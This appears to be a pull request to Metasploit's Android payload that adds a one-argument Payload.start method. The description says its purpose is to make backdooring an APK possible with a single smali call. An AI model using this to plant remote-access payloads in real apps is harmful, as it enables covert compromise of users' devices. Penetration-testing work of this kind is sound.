### PR TITLE
Add simple Payload.start function

### DIFF
--- a/androidpayload/app/src/com/metasploit/stage/MainActivity.java
+++ b/androidpayload/app/src/com/metasploit/stage/MainActivity.java
@@ -8,7 +8,7 @@ public class MainActivity extends Activity
     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
-        Payload.startInPath(getFilesDir().toString());
+        Payload.start(this);
         finish();
     }
 }

--- a/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -1,5 +1,7 @@
 package com.metasploit.stage;
 
+import android.content.Context;
+
 import java.io.DataInputStream;
 import java.io.DataOutputStream;
 import java.io.File;
@@ -27,6 +29,10 @@ public class Payload {
     private static final Random rnd = new Random();
 
     private static String[] parameters;
+
+    public static void start(Context context) {
+        startInPath(context.getFilesDir().toString());
+    }
 
 	public static void startAsync() {
 		new Thread() {


### PR DESCRIPTION
This change adds a simple Payload.start method requiring only one argument, which makes it easier to backdoor an apk with only 1 smali function call (e.g https://github.com/timwr/metasploit-framework/blob/apk_backdoor/tools/apk_backdoor.rb#L70)

This was requested here:
https://github.com/rapid7/metasploit-javapayload/issues/24#issuecomment-84133589
as it had been removed with this change: https://github.com/rapid7/metasploit-javapayload/commit/80190e6b8c58b5be71c9c2c2fba8bff7b415f91b
